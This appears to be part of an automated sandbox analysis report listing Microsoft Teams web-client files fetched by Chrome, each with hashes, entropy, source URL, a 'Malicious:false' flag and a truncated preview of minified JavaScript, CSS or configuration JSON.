                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[138792],{51304:()=>{!function(){var e=["user-blocking","user-visible","background"];class r{constructor(){this.channel_=new MessageChannel,this.sendPort_=this.channel_.port2,this.messages_={},this.nextMessageHandle_=1,this.channel_.port1.onmessage=e=>this.onMessageReceived_(e)}queueCallback(e){var r=this.nextMessageHandle_++;return this.messages_[r]=e,this.sendPort_.postMessage(r),r}cancelCallback(e){delete this.messages_[e]}onMessageReceived_(e){var r=e.data;if(r in this.messages_){var t=this.messages_[r];delete this.messages_[r],t()}}}function t(){return t.instance_||(t.instance_=new r),t.instance_}class i{constructor(e,r,t){void 0===t&&(t=0),this.callback_=e,this.callbackType_=null,this.handle_=null,this.canceled_=!1,this.schedule_(r,t)}isIdleCallback(){return 0===this.callbackType_}cancel(){if(!this.canceled_)switch(this.canceled_=!0,this.callbackType_){case 0:cancelIdleCallback(this.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (12784)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):12892
                                                                                                                                                                                                                                                                            Entropy (8bit):5.2851931540612
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:MSOTrzovZkSm7RnWtWl69Xyx15HbLQ9QVvPqukPk5wId11nrRmfPC4ImdB:MSOTXovZkSm9aWv157LQqVviuGK1dLrG
                                                                                                                                                                                                                                                                            MD5:E95DEA0CDD404F8CB47F05AF0A8C7F43
                                                                                                                                                                                                                                                                            SHA1:2FA2ACE2E817171FD7A1B356EB5546C02401843D
                                                                                                                                                                                                                                                                            SHA-256:D8EC43BD0FAA293FC959F6397748F1320BA5C668B897BD9FC641A5811CCCAC25
                                                                                                                                                                                                                                                                            SHA-512:9284556B41314E895076DC7CFCF9209B831AF8A92929D1E11555489F76725FA05367C909458E5786B55A04DDF5009B5F8AE0B0A3F5AB8AE629168AAA2734276B
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/215111-2951feaff7545a06.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[215111],{578902:(e,t,n)=>{n.d(t,{Z:()=>m});var r=n(513432);function o(e,t){if(!e)return;const n=e;n._virtual||(n._virtual={}),n._virtual.parent=t}var a=n(388504),i=n(35871),s=n(526521),l=n(96215),c=n(949485);const u=(0,n(965804).O)({root:{qhf8xq:"f1euv43f",Bhzewxz:"f15twtuk",oyh7mz:["f1vgc2s3","f1e31b4d"],j35jbq:["f1e31b4d","f1vgc2s3"],Bj3rh1h:"f494woh"}}),d=r.useInsertionEffect,f=e=>{const{element:t,className:n}=(0,a.h)(e.mountNode),f=r.useRef(null),p=(e=>{const{targetDocument:t,dir:n}=(0,i.useFluent_unstable)(),o=(0,i.usePortalMountNode)(),a=(0,l.Y)(),f=u(),p=(0,i.useThemeClassName_unstable)(),m=(0,s.z)(p,f.root,e.className),b=null!=o?o:null==t?void 0:t.body,v=(0,c.K)((()=>{if(void 0===b||e.disabled)return[null,()=>null];const t=b.ownerDocument.createElement("div");return b.appendChild(t),[t,()=>t.remove()]}),[b]);return d?d((()=>{if(!v)return;const e=m.split(" ").filter(Bo
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):523724
                                                                                                                                                                                                                                                                            Entropy (8bit):5.476400961464862
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:Lgz+NZzklPJENyqRNwWtSEjdR/ACL4KNet7OGhWLAaySlP49EEL0W:Lu+NZzklPJENTjFLbShWLlP42ELZ
                                                                                                                                                                                                                                                                            MD5:BE4B51582A0521FE1550B58B7EB4C4F3
                                                                                                                                                                                                                                                                            SHA1:ECA10EDC364A804F652C805E1EFC285DF1F45DDA
                                                                                                                                                                                                                                                                            SHA-256:CADFEACA4BC0C8B642A786CC195C55D05970FA1DD78E993AD16C1FA5561D8B1F
                                                                                                                                                                                                                                                                            SHA-512:903BABFD1FD4129C5BB7EA17AE4C8C2EB7B78A75600FF70F5D543AC1468C62548A55BDBC3ECE527F928C874A145733363F05E1B6CE2E7FA4391BE395924E10C3
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:"https://config.teams.microsoft.com/config/v1/MicrosoftTeams/1415_1.0.0.0?environment=prod&experience=react-web-client&buildType=production&virtualization=&browser=chrome&osPlatform=windows&isOcdi=false&isPwa=false&experienceBuild=24102001318&teamsLocale=en-us&agents=TeamsNorthstar,TeamsBuilds,Segmentation&ECSCanary=1"
                                                                                                                                                                                                                                                                            Preview:{"ECS":{"ConfigLogTarget":"default","c72ea287-ed77-4fa6-a480-3712406c367e":"aka.ms/EcsCanary"},"Segmentation":{"EliteUsers":"false","M365CopilotPPVAll":"false","M365ChatAllow":"false","EarlyR2Ring":"false","IsInternalUser":"false","VirtualizationEnabled":"false","TeamsRing":"general","MWWhilteListedUser":"false","Cloud":"Public","AudienceGroup":"general"},"TeamsBuilds":{"BuildSettings":{"MetaosStore":{"BuildVersion":"24103013800"},"WebView2PreAuth":{"x64":{"latestVersion":"24295.605.3225.8804","buildLink":"https://installer.teams.static.microsoft/production-windows-x64/24295.605.3225.8804/MSTeams-x64.msix"},"x86":{"latestVersion":"24295.605.3225.8804","buildLink":"https://installer.teams.static.microsoft/production-windows-x86/24295.605.3225.8804/MSTeams-x86.msix"},"arm64":{"latestVersion":"24295.605.3225.8804","buildLink":"https://installer.teams.static.microsoft/production-windows-arm64/24295.605.3225.8804/MSTeams-arm64.msix"}},"CustomerServiceChatbot":{"BuildVersion":"2024111101"},"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (21374)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):21482
                                                                                                                                                                                                                                                                            Entropy (8bit):5.450277752670294
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:tvcRoqqXG+VCveOSSxVOKI1PNcWfAfU+lJNwVA1Zt4N7TK07omHFeGvKbO0vBWwT:tvcRoqqXGgCveOSSxVOKI1PNcuAfU+lN
                                                                                                                                                                                                                                                                            MD5:476B18006649097B18D7BFA43AFC701F
                                                                                                                                                                                                                                                                            SHA1:0A541240E245F9CF3544768D7C9ACCE2442CD205
                                                                                                                                                                                                                                                                            SHA-256:714F5782F6A6AA99F008B4D892E977C8ADCF8B71791A16EE18E9DBC1CBBFDB12
                                                                                                                                                                                                                                                                            SHA-512:AB9EBC2808F69B391FC8730E53F83B8D001FDE7957B42626CB751A2E9FEAED0A5C137A2AC9C957D26A8A393AFA003D88C946DC9F988FD550F4B0BD4243FABCD8
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/129917-4d360edd57ebd485.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[129917],{791845:(e,t,n)=>{n.d(t,{g4:()=>r,oj:()=>l,En:()=>a});var o=n(513432);const i=()=>{},s={controller:{active:i,blur:i,find:i,first:i,focus:i,focusLastActive:i,scrollActiveIntoView:i,last:i,next:i,prev:i,showAttributes:i,hideAttributes:i,showFocusVisibleAttributes:i,hideFocusVisibleAttributes:i}},c=o.createContext(void 0),r=c.Provider,l=()=>{var e;return null!==(e=o.useContext(c))&&void 0!==e?e:s},a=()=>!!o.useContext(c)},854687:(e,t,n)=>{n.d(t,{Z:()=>h});var o=n(513432),i=n(602835),s=n(478304),c=n(642543),r=n(35871),l=n(277195);const a="data-activedescendant",u="data-activedescendant-focusvisible",d=e=>{if(!e)return;const t=f(e.parentElement);if(!t)return;const{offsetHeight:n}=e,o=p(e,t),{scrollMarginTop:i,scrollMarginBottom:s}=v(e),{offsetHeight:c,scrollTop:r}=t,l=o+n+s>r+c;o-i<r?t.scrollTo(0,o-i-2):l&&t.scrollTo(0,o+n+s-c+2)},f=e=>e?e.scrollHeight>e.offsetHeight?e:f(e
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1361496
                                                                                                                                                                                                                                                                            Entropy (8bit):5.711280397830716
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24576:talW5XRu/Ztmr+koI7Dxv1vQyQ3MvWHTRkjE2w/QNnLCXSg6ygOXCpb5uTzsX/Kc:talW5XRu/Ztmr+dTRk2QNnLCXSg6ygOc
                                                                                                                                                                                                                                                                            MD5:5677046DBBD9CE033CAEFE6261A0A5B8
                                                                                                                                                                                                                                                                            SHA1:E4D550E9BA79ECD39DD25C1BBE1BFD1DB4DB9B2B
                                                                                                                                                                                                                                                                            SHA-256:052D727F7771D5EE93A2E5585ADD26242E80D69CC43874A2451462B0563357A6
                                                                                                                                                                                                                                                                            SHA-512:6A0F773E067E87C162C11008788017C551BC0CC6B5029723FC24A446ACD8ADAA4A93923B35E78E2B4FC81C5D0F723E8BC0D8FD3E5D9EC3E564C557177AD5B877
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/griffel-78de3547bc6e8dcd.css
                                                                                                                                                                                                                                                                            Preview:.r1sgsif7{outline:2px solid var(--colorPaletteNavyBorderActive);}.ru42dn6{outline:2px solid var(--colorStatusDangerBackground3);}.rc5rb6b{list-style-type:none;display:flex;align-items:center;margin:0;padding:0;}.r1tl60rs{display:flex;align-items:center;color:var(--colorNeutralForeground2);box-sizing:border-box;text-wrap:nowrap;}.rk008qs{display:flex;}.rxqbxwz{color:inherit;font-family:inherit;padding:0px;border-style:none;-webkit-appearance:button;-moz-appearance:button;appearance:button;text-align:unset;background-color:transparent;display:flex;height:100%;align-items:center;border:var(--strokeWidthThin) solid var(--colorTransparentStroke);border-left-color:var(--colorNeutralStroke1);border-top-left-radius:var(--borderRadiusNone);border-bottom-left-radius:var(--borderRadiusNone);}.rxqbxwz[data-fui-focus-visible]{outline:var(--strokeWidthThick) solid var(--colorStrokeFocus2);}.rdjx360{color:inherit;font-family:inherit;padding:0px;border-style:none;-webkit-appearance:button;-moz-appeara
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):251568
                                                                                                                                                                                                                                                                            Entropy (8bit):5.245270487365831
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:iVWVXAVGzuTTWj1dtoy4HMT0dcaTehi5KnxDvwq7vri9kX71d6kqJGXjimk4D:Cz/Wj1Ay4LcaTehi5KxjLd1PiwnD
                                                                                                                                                                                                                                                                            MD5:3EE65944077B46B27938558FA1BF5AC5
                                                                                                                                                                                                                                                                            SHA1:C2212294D70683C4E7F924BB8DA0CB6BF51AD2C8
                                                                                                                                                                                                                                                                            SHA-256:690CD7C6E4347E02D31E6A96363AEE759F6BC0DD48EF35382FCDD3A197B2A5D6
                                                                                                                                                                                                                                                                            SHA-512:6B990B7AEA54F9D6361754D8A50BEB0EFE9B83D43DF8DBB841F191CA156680F2A215FDDFDCD2C510F855CC3E8D708FE9B8B372709CE2E9084EAF9E875BE0ED91
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[418261],{657953:(e,t,n)=>{"use strict";var o,r;n.d(t,{F:()=>o}),function(e){e[e.Client=0]="Client",e[e.Server=1]="Server"}(o||(o={})),function(e){e.None="None",e.RecentlyAccessed="RecentlyAccessed",e.Frequent="Frequent",e.Trending="Trending",e.Uploaded="Uploaded"}(r||(r={}))},418967:(e,t,n)=>{"use strict";n.d(t,{X:()=>r});var o=n(408723);class r extends o.b{constructor(){super(),this.addListener=super.addListener.bind(this),this.on=super.on.bind(this),this.once=super.once.bind(this),this.prependListener=super.prependListener.bind(this),this.prependOnceListener=super.prependOnceListener.bind(this),this.removeListener=super.removeListener.bind(this),this.off=super.off.bind(this)}}},402344:(e,t,n)=>{"use strict";var o;n.d(t,{K:()=>o}),function(e){e[e.Disconnected=0]="Disconnected",e[e.EstablishingConnection=3]="EstablishingConnection",e[e.CatchingUp=1]="CatchingUp",e[e.Connected=2]="Connecte
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):378372
                                                                                                                                                                                                                                                                            Entropy (8bit):5.447221326420668
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:tTPlsDwo0lV1LzACWOitEB3it4t4A8T+X6cQaFZRCXv+CDHaTDJu+qADyY1YSaBV:xPiDwGOitEB3it4t4A8T9gCLQGHSgV
                                                                                                                                                                                                                                                                            MD5:2BB75370039C53C5D0DF8F9F00CA25CB
                                                                                                                                                                                                                                                                            SHA1:9558BF060145E9803F32C76BB214DAA46EEF1484
                                                                                                                                                                                                                                                                            SHA-256:209F14BAE778016020A13C88E861A2565D98E41B2ACCF7ED16E5134B8D982717
                                                                                                                                                                                                                                                                            SHA-512:25BF87B4B37CB58180B60EB1A5A753737242AA73311F2608663BE4B162385AA521CB2869470A39B240E4856C87BD55C9DEA02D491D5505414F0CD845E0E445FE
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[889503,583674,361293],{583674:(e,t)=>{function i(e){return null!=e&&"function"==typeof e.then}function r(e){return null!=e&&"function"==typeof e.cancel}function n(e,i){if(!t.config.catchExceptions)return e();try{return e()}catch(e){return i(e)}}Object.defineProperty(t,"__esModule",{value:!0}),t.config={exceptionsToConsole:!0,catchExceptions:!0,traceEnabled:!1,exceptionHandler:void 0,unhandledErrorHandler:function(e){throw e}},t.fromThenable=function(e){var t=g();return e.then((function(e){t.resolve(e)}),(function(e){t.reject(e)})),t.promise().thenAsync((function(e){return e}))};var s,o=[],a="undefined"!=typeof setImmediate;function l(e){o.push(e),1===o.length&&(a?setImmediate(c):setTimeout(c,0))}function c(){var e=o;o=[];for(var t=0;t<e.length;t++)e[t]()}function g(){return new s.SyncTask}function d(e){return(new s.SyncTask).resolve(e).promise()}function u(e){var t=g(),n=!1;r
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65530), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):76664
                                                                                                                                                                                                                                                                            Entropy (8bit):5.383677740005568
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:wXUT8r3L7pLbcDlcVlrQhUdllRQeLSJ55+AvtoWqDX/mSN/H8T7R1t5:byL7dcD6VQP+YoWqDX/mSN/H8T7R1t5
                                                                                                                                                                                                                                                                            MD5:C33EB9A55D51004C111124DE1BB8B177
                                                                                                                                                                                                                                                                            SHA1:09777BAD1B40A331063D10FAC89CECD440852F37
                                                                                                                                                                                                                                                                            SHA-256:AEA2DE896989E277B14135AECE7F4FF8421E9A2B26F5C57C3458E72C2536146F
                                                                                                                                                                                                                                                                            SHA-512:8550F1AE933DBB5CBE8E971FBDCA56D8757352E1204EADE7AE16AFC25115BED9BB227A9EC98ABBFCB997EC94CBDC41C82E455C096BA2C3BBF5DBD292DC512F79
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[688261,308346,390601,472903,173388,951007],{414214:(e,t,r)=>{r.d(t,{M:()=>o});var o=function(e){return{attributes:{dismissAction:{"aria-describedby":e.bodyId}}}}},182227:(e,t,r)=>{r.d(t,{K:()=>o});var o=function(){return{attributes:{root:{role:"img","aria-hidden":"true"}}}}},498255:(e,t,r)=>{r.d(t,{K:()=>a});var o=r(953543),n=r(504405),a=function(e){var t;return{attributes:{root:(t={"aria-checked":"mixed"===e.checked?"mixed":!!e.checked,"aria-disabled":e.disabled,role:"checkbox",tabIndex:0},t[n.P]=!0,t)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:o.ZG}]}}}}}},244211:(e,t,r)=>{r.d(t,{K:()=>c});var o=r(55543),n=r.n(o),a=r(76424),s=r.n(a),l=r(953543),i=r(928879),c=function(e){var t=(0,i.Z)(Object.assign({},e,{inline:!e.contextMenu}));return s()(t,{attributes:{trigger:Object.assign({},e.open&&{"aria-controls":e.menuId},e.open&&!e.contextMenu&&{"aria-expanded":"true
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (37256)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):37364
                                                                                                                                                                                                                                                                            Entropy (8bit):5.170958810990217
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:BgwG2MtRs/YW7+g5UBj74DvpttZwJbhTJrSK4VxjPHRYOI+AmOkmMOkxp+hg8XFw:UHaYWSg57DvpttZwJbhTJrSK4VxjPHRp
                                                                                                                                                                                                                                                                            MD5:52534697E120336121D1A6AAC1B71E1F
                                                                                                                                                                                                                                                                            SHA1:6E1D1AE84312C249D20F0E215028564CE2DE987A
                                                                                                                                                                                                                                                                            SHA-256:6EDEF2224A589C15EA4E9964C7E419F8FE8DA1492F7A9E0119F55486E10E62D2
                                                                                                                                                                                                                                                                            SHA-512:D3FDDB3E2724B73063249F6DFC96FC0DFC030D4EB696B15CDD1C8A861024489F80E6BE4A82DC86F1109C1CB2D7FA62CBF6BB6307B06ED246A85042CCC93D2C4F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[918681],{48374:(r,o,e)=>{e.d(o,{vqc:()=>a,xyI:()=>l,$xS:()=>t,ozo:()=>c,yd$:()=>n,nkM:()=>d,Qpb:()=>u,DoI:()=>g,oam:()=>v,ww0:()=>B,e5x:()=>i,j0c:()=>s,Er0:()=>k,epd:()=>f,uf9:()=>P});const a="Shift",l="Enter",t=" ",c="Tab",n="ArrowDown",d="ArrowLeft",u="ArrowRight",g="ArrowUp",v="End",B="Home",i="PageDown",s="PageUp",k="Backspace",f="Delete",P="Escape"},188206:(r,o,e)=>{e.d(o,{F:()=>t});var a=e(48374),l=e(602835);e(513432);function t(r,o){const{disabled:e,disabledFocusable:t=!1,"aria-disabled":c,onClick:n,onKeyDown:d,onKeyUp:u,...g}=null!=o?o:{},v="string"==typeof c?"true"===c:c,B=e||t||v,i=(0,l.D)((r=>{B?(r.preventDefault(),r.stopPropagation()):null==n||n(r)})),s=(0,l.D)((r=>{if(null==d||d(r),r.isDefaultPrevented())return;const o=r.key;if(B&&(o===a.xyI||o===a.$xS))return r.preventDefault(),void r.stopPropagation();o!==a.$xS?o===a.xyI&&(r.preventDefault(),r.currentTarget.cli
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (31315)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):31421
                                                                                                                                                                                                                                                                            Entropy (8bit):5.398625723740512
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:tdO5w+pZxoNvL7h75ihyMxceZAYZeYSZeQGoIzNm2MzebMYz8zpEzsJi:k8/e4fKRm2Ii
                                                                                                                                                                                                                                                                            MD5:683B05084B31459B6D8B328BDA6E4A26
                                                                                                                                                                                                                                                                            SHA1:7F73878DCBBAF3542EB5A2F8D9823358E1836AD1
                                                                                                                                                                                                                                                                            SHA-256:231472340E56061F645399B50A5034C1AD6CE3C76B40B339DF2F93D342499993
                                                                                                                                                                                                                                                                            SHA-512:5FED6304AF14EA7D4B27A7B6BF0DCF07C9B15084EAADE90B469249F411C9EE7C5F4C598923F14DB70E7A0E70D62C12B0075F644299C13D94CF8A94C87F5AF6B1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/main-509448184a736eca.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[138792],{51304:()=>{!function(){var e=["user-blocking","user-visible","background"];class r{constructor(){this.channel_=new MessageChannel,this.sendPort_=this.channel_.port2,this.messages_={},this.nextMessageHandle_=1,this.channel_.port1.onmessage=e=>this.onMessageReceived_(e)}queueCallback(e){var r=this.nextMessageHandle_++;return this.messages_[r]=e,this.sendPort_.postMessage(r),r}cancelCallback(e){delete this.messages_[e]}onMessageReceived_(e){var r=e.data;if(r in this.messages_){var t=this.messages_[r];delete this.messages_[r],t()}}}function t(){return t.instance_||(t.instance_=new r),t.instance_}class i{constructor(e,r,t){void 0===t&&(t=0),this.callback_=e,this.callbackType_=null,this.handle_=null,this.canceled_=!1,this.schedule_(r,t)}isIdleCallback(){return 0===this.callbackType_}cancel(){if(!this.canceled_)switch(this.canceled_=!0,this.callbackType_){case 0:cancelIdleCallback(this.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):515529
                                                                                                                                                                                                                                                                            Entropy (8bit):5.2538663457384
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:CPaFNMUHLAVxQ/1Dt91N6FGGaUasEhecD/BEKQo3kAZyRirCVg09Q:CC4a1DtWcg9Q
                                                                                                                                                                                                                                                                            MD5:DF02C7743B36BB93FE20CA9EF4BACDCF
                                                                                                                                                                                                                                                                            SHA1:C0C7F65F57F901E12E33CE9C313379BB466C1141
                                                                                                                                                                                                                                                                            SHA-256:BDD6237E623ACEDA1AC099EAED7DCB9EAF9013058419884787D9DDAEF95471BF
                                                                                                                                                                                                                                                                            SHA-512:EBE273C86C207152CD0FE472E0073C61275CD432317F3029301DAACB877425E2262D6991AF065E1F8152909999C3AFE9B4C60E897809A5F3728210FE58E66CE5
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/771953-da38c6ed505491d5.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[771953],{327005:(e,t,i)=>{"use strict";i.d(t,{c:()=>o});var n=i(362328);const a={kind:"Document",get definitions(){const e=(0,n.G)("query ServicesIoDataCallingServiceAdaptersActivitySettingsQuery($appId:String!,$subCategoryPageId:String) {activitySettings(appId:$appId,subCategoryPageId:$subCategoryPageId) {id,error,settingsList {key,value}}}");return delete this.definitions,this.definitions=e.definitions}};var r=i(354776);const o=async e=>{const{data:t}=await e.query({query:a,fetchPolicy:"no-cache",variables:{appId:r.n5.Meetings,subCategoryPageId:r.n5.Meetings}});return t?.activitySettings?.settingsList}},230749:(e,t,i)=>{"use strict";i.d(t,{R:()=>ee});var n=i(332752),a=i(805809),r=i(724801),o=i(424096),l=i(364819),s=i(554186),c=i(194649),d=i(46377),g=i(2596),p=i(926751);const u={403:"Forbidden",404:"NotFound",409:"Conflict",500:"InternalServerError",400:"BadRequest",503:"ServiceUnavailab
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (15842)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):15950
                                                                                                                                                                                                                                                                            Entropy (8bit):5.401055303230981
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:UD09xNypTbzbWXu9mEC1ND4z6Dl0cyj2YaCLChb2B6ztY1CD105CfqH:UD0Xk5viXu9m7jD4GucW2YJWp2B6zS1Z
                                                                                                                                                                                                                                                                            MD5:229EED66C6AC955B9F35684305A2C295
                                                                                                                                                                                                                                                                            SHA1:5C74966096AF404353499E2E2865F08A48000BB4
                                                                                                                                                                                                                                                                            SHA-256:4877E43F2D17AC47934D283BD4E7797854C02BD29CF66172962740D9EEB14544
                                                                                                                                                                                                                                                                            SHA-512:BEA37B2D2754FA815E90C7F5002F3CFB7F7CDD9266E1AEBDE1501EEC07944DF379D1070B70A9EAB3E1215604CBD97752DCE0FF3CF41998435FD21C451521669E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/921389-54407823cab86627.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[921389],{111386:(e,t,n)=>{n.d(t,{xY:()=>r,Yb:()=>o});const r=e=>"object"==typeof e&&"string"==typeof e?.name&&"object"==typeof e?.fluid,o=e=>{const t=e;return"object"==typeof t&&("string"==typeof t?.package||r(t?.package))&&(void 0===t?.config||"object"==typeof t?.config)}},894082:(e,t,n)=>{n.d(t,{Qs:()=>i,uF:()=>s,hj:()=>a,kL:()=>d,Aj:()=>u});var r=n(747430);const o="fluidOdspDriverManifestCache_";function i(e){const t=(0,r.Ar)()?.getItem(c(e));if(!t)return null;return JSON.parse(t)}function s(e,t){if(!(0,r.Ar)())return;const n={...e,lastUpdatedTime:Date.now()};(0,r.Ar)()?.setItem(c(t),JSON.stringify(n))}function a(){return!!(0,r.Ar)()}function c(e){return o+(e||"Prod")}function d(e){const t=(0,r.Ar)()?.getItem(l(e));return t||null}function u(e,t){(0,r.Ar)()&&(0,r.Ar)()?.setItem(l(t),e)}function l(e){return c(e)+"_prefetch"}},813899:(e,t,n)=>{n.d(t,{mE:()=>b,A6:()=>y,d:()=>g
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):68001
                                                                                                                                                                                                                                                                            Entropy (8bit):5.4641406890766735
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:htqnERGFVFUX2aWZ28xw29/Qs0FPsigdWusCNMvOZvZ/C7rMnNRjP3:6m2aCg7rM3
                                                                                                                                                                                                                                                                            MD5:501B9A40586E690F4951D011050FB92E
                                                                                                                                                                                                                                                                            SHA1:2CA6C52FCE474D00DD7A4BD8A01180832DA90A64
                                                                                                                                                                                                                                                                            SHA-256:49466B5940D9ABCE66BCA1228FF4583B38EF4E2A03F306026058354C32012876
                                                                                                                                                                                                                                                                            SHA-512:CFF558C7CA7308AEB8C3831996672C17D639841781762DD1A71928294BAEB488F2DBBE67062BA7760D87E14CF703A814593FE41E612036681110F44776A0187B
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/441408-59c7bce56597ae49.js
